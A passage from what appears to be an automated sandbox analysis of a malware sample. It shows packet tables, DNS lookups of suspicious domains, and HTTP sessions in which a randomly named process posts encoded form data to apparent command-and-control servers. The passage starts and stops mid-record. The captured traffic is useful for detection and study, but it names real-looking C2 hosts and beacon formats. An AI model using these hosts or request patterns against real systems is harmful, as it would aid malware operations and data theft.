                                                                                                                    Jan 10, 2025 20:50:36.655498028 CET8050012208.91.197.27192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:36.655527115 CET8050012208.91.197.27192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:36.655577898 CET5001280192.168.2.6208.91.197.27
                                                                                                                    Jan 10, 2025 20:50:36.655885935 CET8050012208.91.197.27192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:36.655950069 CET8050012208.91.197.27192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:36.655953884 CET5001280192.168.2.6208.91.197.27
                                                                                                                    Jan 10, 2025 20:50:36.655962944 CET8050012208.91.197.27192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:36.655975103 CET8050012208.91.197.27192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:36.655997992 CET5001280192.168.2.6208.91.197.27
                                                                                                                    Jan 10, 2025 20:50:36.656749964 CET8050012208.91.197.27192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:36.656971931 CET8050012208.91.197.27192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:36.656985044 CET8050012208.91.197.27192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:36.656996965 CET8050012208.91.197.27192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:36.657027960 CET5001280192.168.2.6208.91.197.27
                                                                                                                    Jan 10, 2025 20:50:36.657696009 CET8050012208.91.197.27192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:36.657708883 CET8050012208.91.197.27192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:36.657720089 CET8050012208.91.197.27192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:36.657731056 CET8050012208.91.197.27192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:36.657749891 CET5001280192.168.2.6208.91.197.27
                                                                                                                    Jan 10, 2025 20:50:36.657778025 CET5001280192.168.2.6208.91.197.27
                                                                                                                    Jan 10, 2025 20:50:36.659229994 CET8050012208.91.197.27192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:36.659301043 CET5001280192.168.2.6208.91.197.27
                                                                                                                    Jan 10, 2025 20:50:36.663357973 CET5001280192.168.2.6208.91.197.27
                                                                                                                    Jan 10, 2025 20:50:36.668224096 CET8050012208.91.197.27192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:58.207158089 CET5001380192.168.2.676.223.67.189
                                                                                                                    Jan 10, 2025 20:50:58.211973906 CET805001376.223.67.189192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:58.212068081 CET5001380192.168.2.676.223.67.189
                                                                                                                    Jan 10, 2025 20:50:58.232202053 CET5001380192.168.2.676.223.67.189
                                                                                                                    Jan 10, 2025 20:50:58.237140894 CET805001376.223.67.189192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:58.721283913 CET805001376.223.67.189192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:58.721380949 CET805001376.223.67.189192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:58.721484900 CET5001380192.168.2.676.223.67.189
                                                                                                                    Jan 10, 2025 20:51:00.249833107 CET5001380192.168.2.676.223.67.189

                                                                                                                    UDP Packets

                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                    Jan 10, 2025 20:48:36.553919077 CET6528953192.168.2.61.1.1.1
                                                                                                                    Jan 10, 2025 20:48:36.563625097 CET53652891.1.1.1192.168.2.6
                                                                                                                    Jan 10, 2025 20:48:41.590146065 CET5899353192.168.2.61.1.1.1
                                                                                                                    Jan 10, 2025 20:48:41.651665926 CET53589931.1.1.1192.168.2.6
                                                                                                                    Jan 10, 2025 20:48:48.738039017 CET6500653192.168.2.61.1.1.1
                                                                                                                    Jan 10, 2025 20:48:48.752010107 CET53650061.1.1.1192.168.2.6
                                                                                                                    Jan 10, 2025 20:48:53.768492937 CET5472853192.168.2.61.1.1.1
                                                                                                                    Jan 10, 2025 20:48:54.146317005 CET53547281.1.1.1192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:10.082072973 CET6129953192.168.2.61.1.1.1
                                                                                                                    Jan 10, 2025 20:49:10.095906973 CET53612991.1.1.1192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:23.487555027 CET5743453192.168.2.61.1.1.1
                                                                                                                    Jan 10, 2025 20:49:23.501699924 CET53574341.1.1.1192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:36.832091093 CET5874553192.168.2.61.1.1.1
                                                                                                                    Jan 10, 2025 20:49:37.828212023 CET5874553192.168.2.61.1.1.1
                                                                                                                    Jan 10, 2025 20:49:38.171230078 CET53587451.1.1.1192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:38.171334982 CET53587451.1.1.1192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:51.988637924 CET5246753192.168.2.61.1.1.1
                                                                                                                    Jan 10, 2025 20:49:52.074727058 CET53524671.1.1.1192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:05.394680977 CET5906953192.168.2.61.1.1.1
                                                                                                                    Jan 10, 2025 20:50:05.416083097 CET53590691.1.1.1192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:18.707369089 CET6004153192.168.2.61.1.1.1
                                                                                                                    Jan 10, 2025 20:50:19.363799095 CET53600411.1.1.1192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:27.502366066 CET6399953192.168.2.61.1.1.1
                                                                                                                    Jan 10, 2025 20:50:27.735404968 CET53639991.1.1.1192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:41.675653934 CET5157253192.168.2.61.1.1.1
                                                                                                                    Jan 10, 2025 20:50:41.684838057 CET53515721.1.1.1192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:49.738352060 CET6274353192.168.2.61.1.1.1
                                                                                                                    Jan 10, 2025 20:50:50.136668921 CET53627431.1.1.1192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:58.191602945 CET5139853192.168.2.61.1.1.1
                                                                                                                    Jan 10, 2025 20:50:58.203741074 CET53513981.1.1.1192.168.2.6

                                                                                                                    DNS Queries

                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                    Jan 10, 2025 20:48:36.553919077 CET192.168.2.61.1.1.10xb4f7Standard query (0)www.1337street.shopA (IP address)IN (0x0001)false
                                                                                                                    Jan 10, 2025 20:48:41.590146065 CET192.168.2.61.1.1.10x91b6Standard query (0)www.mosquitoxp.lolA (IP address)IN (0x0001)false
                                                                                                                    Jan 10, 2025 20:48:48.738039017 CET192.168.2.61.1.1.10x7d9eStandard query (0)www.clubhoodies.shopA (IP address)IN (0x0001)false
                                                                                                                    Jan 10, 2025 20:48:53.768492937 CET192.168.2.61.1.1.10xaa30Standard query (0)www.jrcov55qgcxp5fwa.topA (IP address)IN (0x0001)false
                                                                                                                    Jan 10, 2025 20:49:10.082072973 CET192.168.2.61.1.1.10x509bStandard query (0)www.winningpath.xyzA (IP address)IN (0x0001)false
                                                                                                                    Jan 10, 2025 20:49:23.487555027 CET192.168.2.61.1.1.10xda22Standard query (0)www.buyspeechst.shopA (IP address)IN (0x0001)false
                                                                                                                    Jan 10, 2025 20:49:36.832091093 CET192.168.2.61.1.1.10x14d7Standard query (0)www.dodowo.shopA (IP address)IN (0x0001)false
                                                                                                                    Jan 10, 2025 20:49:37.828212023 CET192.168.2.61.1.1.10x14d7Standard query (0)www.dodowo.shopA (IP address)IN (0x0001)false
                                                                                                                    Jan 10, 2025 20:49:51.988637924 CET192.168.2.61.1.1.10x1de1Standard query (0)www.milp.storeA (IP address)IN (0x0001)false
                                                                                                                    Jan 10, 2025 20:50:05.394680977 CET192.168.2.61.1.1.10xd094Standard query (0)www.did-ready.infoA (IP address)IN (0x0001)false
                                                                                                                    Jan 10, 2025 20:50:18.707369089 CET192.168.2.61.1.1.10x2570Standard query (0)www.vipstargold.buzzA (IP address)IN (0x0001)false
                                                                                                                    Jan 10, 2025 20:50:27.502366066 CET192.168.2.61.1.1.10x438dStandard query (0)www.deacapalla.onlineA (IP address)IN (0x0001)false
                                                                                                                    Jan 10, 2025 20:50:41.675653934 CET192.168.2.61.1.1.10x7c99Standard query (0)www.thomet.netA (IP address)IN (0x0001)false
                                                                                                                    Jan 10, 2025 20:50:49.738352060 CET192.168.2.61.1.1.10x7cd2Standard query (0)www.apptj7.xyzA (IP address)IN (0x0001)false
                                                                                                                    Jan 10, 2025 20:50:58.191602945 CET192.168.2.61.1.1.10xe71bStandard query (0)www.infovea.techA (IP address)IN (0x0001)false

                                                                                                                    DNS Answers

                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                    Jan 10, 2025 20:48:36.563625097 CET1.1.1.1192.168.2.60xb4f7Name error (3)www.1337street.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                    Jan 10, 2025 20:48:41.651665926 CET1.1.1.1192.168.2.60x91b6No error (0)www.mosquitoxp.lol127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                    Jan 10, 2025 20:48:48.752010107 CET1.1.1.1192.168.2.60x7d9eName error (3)www.clubhoodies.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                    Jan 10, 2025 20:48:54.146317005 CET1.1.1.1192.168.2.60xaa30No error (0)www.jrcov55qgcxp5fwa.topzcdn.8383dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                    Jan 10, 2025 20:48:54.146317005 CET1.1.1.1192.168.2.60xaa30No error (0)zcdn.8383dns.com134.122.133.80A (IP address)IN (0x0001)false
                                                                                                                    Jan 10, 2025 20:48:54.146317005 CET1.1.1.1192.168.2.60xaa30No error (0)zcdn.8383dns.com134.122.135.48A (IP address)IN (0x0001)false
                                                                                                                    Jan 10, 2025 20:49:10.095906973 CET1.1.1.1192.168.2.60x509bNo error (0)www.winningpath.xyz209.74.79.41A (IP address)IN (0x0001)false
                                                                                                                    Jan 10, 2025 20:49:23.501699924 CET1.1.1.1192.168.2.60xda22No error (0)www.buyspeechst.shop104.21.112.1A (IP address)IN (0x0001)false
                                                                                                                    Jan 10, 2025 20:49:23.501699924 CET1.1.1.1192.168.2.60xda22No error (0)www.buyspeechst.shop104.21.80.1A (IP address)IN (0x0001)false
                                                                                                                    Jan 10, 2025 20:49:23.501699924 CET1.1.1.1192.168.2.60xda22No error (0)www.buyspeechst.shop104.21.48.1A (IP address)IN (0x0001)false
                                                                                                                    Jan 10, 2025 20:49:23.501699924 CET1.1.1.1192.168.2.60xda22No error (0)www.buyspeechst.shop104.21.32.1A (IP address)IN (0x0001)false
                                                                                                                    Jan 10, 2025 20:49:23.501699924 CET1.1.1.1192.168.2.60xda22No error (0)www.buyspeechst.shop104.21.64.1A (IP address)IN (0x0001)false
                                                                                                                    Jan 10, 2025 20:49:23.501699924 CET1.1.1.1192.168.2.60xda22No error (0)www.buyspeechst.shop104.21.96.1A (IP address)IN (0x0001)false
                                                                                                                    Jan 10, 2025 20:49:23.501699924 CET1.1.1.1192.168.2.60xda22No error (0)www.buyspeechst.shop104.21.16.1A (IP address)IN (0x0001)false
                                                                                                                    Jan 10, 2025 20:49:38.171230078 CET1.1.1.1192.168.2.60x14d7No error (0)www.dodowo.shopdodowo.shopCNAME (Canonical name)IN (0x0001)false
                                                                                                                    Jan 10, 2025 20:49:38.171230078 CET1.1.1.1192.168.2.60x14d7No error (0)dodowo.shop112.175.247.179A (IP address)IN (0x0001)false
                                                                                                                    Jan 10, 2025 20:49:38.171334982 CET1.1.1.1192.168.2.60x14d7No error (0)www.dodowo.shopdodowo.shopCNAME (Canonical name)IN (0x0001)false
                                                                                                                    Jan 10, 2025 20:49:38.171334982 CET1.1.1.1192.168.2.60x14d7No error (0)dodowo.shop112.175.247.179A (IP address)IN (0x0001)false
                                                                                                                    Jan 10, 2025 20:49:52.074727058 CET1.1.1.1192.168.2.60x1de1No error (0)www.milp.store194.9.94.86A (IP address)IN (0x0001)false
                                                                                                                    Jan 10, 2025 20:49:52.074727058 CET1.1.1.1192.168.2.60x1de1No error (0)www.milp.store194.9.94.85A (IP address)IN (0x0001)false
                                                                                                                    Jan 10, 2025 20:50:05.416083097 CET1.1.1.1192.168.2.60xd094No error (0)www.did-ready.info194.245.148.189A (IP address)IN (0x0001)false
                                                                                                                    Jan 10, 2025 20:50:19.363799095 CET1.1.1.1192.168.2.60x2570Server failure (2)www.vipstargold.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                    Jan 10, 2025 20:50:27.735404968 CET1.1.1.1192.168.2.60x438dNo error (0)www.deacapalla.online208.91.197.27A (IP address)IN (0x0001)false
                                                                                                                    Jan 10, 2025 20:50:41.684838057 CET1.1.1.1192.168.2.60x7c99Name error (3)www.thomet.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                    Jan 10, 2025 20:50:50.136668921 CET1.1.1.1192.168.2.60x7cd2Name error (3)www.apptj7.xyznonenoneA (IP address)IN (0x0001)false
                                                                                                                    Jan 10, 2025 20:50:58.203741074 CET1.1.1.1192.168.2.60xe71bNo error (0)www.infovea.techinfovea.techCNAME (Canonical name)IN (0x0001)false
                                                                                                                    Jan 10, 2025 20:50:58.203741074 CET1.1.1.1192.168.2.60xe71bNo error (0)infovea.tech76.223.67.189A (IP address)IN (0x0001)false
                                                                                                                    Jan 10, 2025 20:50:58.203741074 CET1.1.1.1192.168.2.60xe71bNo error (0)infovea.tech13.248.213.45A (IP address)IN (0x0001)false

                                                                                                                    HTTP Request Dependency Graph

                                                                                                                    • www.jrcov55qgcxp5fwa.top
                                                                                                                    • www.winningpath.xyz
                                                                                                                    • www.buyspeechst.shop
                                                                                                                    • www.dodowo.shop
                                                                                                                    • www.milp.store
                                                                                                                    • www.did-ready.info
                                                                                                                    • www.deacapalla.online
                                                                                                                    • www.infovea.tech

                                                                                                                    HTTP Packets

                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    0192.168.2.649985134.122.133.80802196C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Jan 10, 2025 20:48:54.241776943 CET591OUTGET /ah2l/?nzs0T2=0XIysXmjicdWgm2GWI+Thi8VIPF50KgCrB9qe1pxW9F6KmTtpKViQSnjO8JFZFRtQOT2SKyqDZIyiHstHNrbonPRFLzX8YNbLN93hXWxhTtjpF1XokGMpx8sFq4HkBm76WFwIOg=&mLFl=BXYPt2lXBpi8Dj HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.jrcov55qgcxp5fwa.top
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; LG-D722 Build/LRX22G.A1429531854) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/34.0.1847.118 Mobile Safari/537.36
                                                                                                                    Jan 10, 2025 20:48:55.028470039 CET708INHTTP/1.1 404 Not Found
                                                                                                                    Content-Length: 548
                                                                                                                    Content-Type: text/html
                                                                                                                    Date: Fri, 10 Jan 2025 19:48:54 GMT
                                                                                                                    Server: nginx
                                                                                                                    X-Cache: BYPASS
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    1192.168.2.649987209.74.79.41802196C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Jan 10, 2025 20:49:10.118778944 CET845OUTPOST /4p8s/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.winningpath.xyz
                                                                                                                    Origin: http://www.winningpath.xyz
                                                                                                                    Referer: http://www.winningpath.xyz/4p8s/
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 211
                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; LG-D722 Build/LRX22G.A1429531854) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/34.0.1847.118 Mobile Safari/537.36
                                                                                                                    Data Raw: 6e 7a 73 30 54 32 3d 68 5a 41 61 42 72 78 78 31 4b 46 50 4e 68 65 46 43 78 44 51 69 45 4c 47 67 75 36 66 78 47 4a 68 6d 6c 55 32 31 49 4c 35 30 44 73 32 41 6c 4e 34 75 4d 38 2b 43 4d 57 6f 35 6f 75 4d 69 68 61 70 73 35 32 68 2b 51 7a 4a 56 4e 32 4c 37 4a 4f 79 69 77 58 4c 64 35 56 58 75 71 2b 79 57 74 7a 6b 30 74 45 36 35 50 56 48 51 4b 69 4b 33 43 78 5a 4a 59 52 52 38 38 76 4a 72 37 73 57 6a 75 75 6c 37 66 57 72 5a 34 43 63 77 2f 63 7a 44 31 35 64 6a 2b 61 53 7a 46 4c 75 72 61 74 6d 6f 5a 63 44 66 65 51 34 4e 72 54 70 4f 35 61 50 67 76 50 4d 46 34 73 42 43 2f 42 31 56 37 51 76 38 74 2f 57 4c 71 50 6c 50 4c 55 71 6d 73 66 62
                                                                                                                    Data Ascii: nzs0T2=hZAaBrxx1KFPNheFCxDQiELGgu6fxGJhmlU21IL50Ds2AlN4uM8+CMWo5ouMihaps52h+QzJVN2L7JOyiwXLd5VXuq+yWtzk0tE65PVHQKiK3CxZJYRR88vJr7sWjuul7fWrZ4Ccw/czD15dj+aSzFLuratmoZcDfeQ4NrTpO5aPgvPMF4sBC/B1V7Qv8t/WLqPlPLUqmsfb
                                                                                                                    Jan 10, 2025 20:49:10.711013079 CET533INHTTP/1.1 404 Not Found
                                                                                                                    Date: Fri, 10 Jan 2025 19:49:10 GMT
                                                                                                                    Server: Apache
                                                                                                                    Content-Length: 389
                                                                                                                    Connection: close
                                                                                                                    Content-Type: text/html
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    2192.168.2.649988209.74.79.41802196C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Jan 10, 2025 20:49:12.664268017 CET869OUTPOST /4p8s/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.winningpath.xyz
                                                                                                                    Origin: http://www.winningpath.xyz
                                                                                                                    Referer: http://www.winningpath.xyz/4p8s/
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 235
                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; LG-D722 Build/LRX22G.A1429531854) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/34.0.1847.118 Mobile Safari/537.36
                                                                                                                    Data Raw: 6e 7a 73 30 54 32 3d 68 5a 41 61 42 72 78 78 31 4b 46 50 4f 41 4f 46 46 67 44 51 6e 6b 4c 4a 6b 65 36 66 6f 57 4a 6c 6d 6c 6f 32 31 4b 37 70 30 77 59 32 42 48 46 34 38 64 38 2b 50 73 57 6f 74 59 76 45 2f 78 61 79 73 35 7a 55 2b 51 50 4a 56 4e 79 4c 37 4c 47 79 69 68 58 45 4d 35 56 56 37 36 2b 30 53 74 7a 6b 30 74 45 36 35 50 78 39 51 4b 71 4b 33 79 68 5a 62 70 52 4f 30 63 76 4f 38 4c 73 57 75 4f 75 70 37 66 58 4f 5a 39 62 4a 77 37 73 7a 44 77 46 64 6a 73 79 52 36 46 4c 6f 6d 36 73 6d 73 4c 64 48 53 4f 46 61 4f 49 7a 50 4e 71 4c 75 73 35 53 57 5a 4c 73 69 51 76 68 33 56 35 49 64 38 4e 2f 38 4a 71 33 6c 64 63 59 4e 70 59 36 34 41 47 4f 36 78 71 67 4e 51 52 2b 79 67 4e 4b 68 4c 74 2f 61 31 41 3d 3d
                                                                                                                    Data Ascii: nzs0T2=hZAaBrxx1KFPOAOFFgDQnkLJke6foWJlmlo21K7p0wY2BHF48d8+PsWotYvE/xays5zU+QPJVNyL7LGyihXEM5VV76+0Stzk0tE65Px9QKqK3yhZbpRO0cvO8LsWuOup7fXOZ9bJw7szDwFdjsyR6FLom6smsLdHSOFaOIzPNqLus5SWZLsiQvh3V5Id8N/8Jq3ldcYNpY64AGO6xqgNQR+ygNKhLt/a1A==
                                                                                                                    Jan 10, 2025 20:49:13.275042057 CET533INHTTP/1.1 404 Not Found
                                                                                                                    Date: Fri, 10 Jan 2025 19:49:13 GMT
                                                                                                                    Server: Apache
                                                                                                                    Content-Length: 389
                                                                                                                    Connection: close
                                                                                                                    Content-Type: text/html
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    3192.168.2.649989209.74.79.41802196C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Jan 10, 2025 20:49:15.325737953 CET1882OUTPOST /4p8s/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.winningpath.xyz
                                                                                                                    Origin: http://www.winningpath.xyz
                                                                                                                    Referer: http://www.winningpath.xyz/4p8s/
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 1247
                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; LG-D722 Build/LRX22G.A1429531854) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/34.0.1847.118 Mobile Safari/537.36
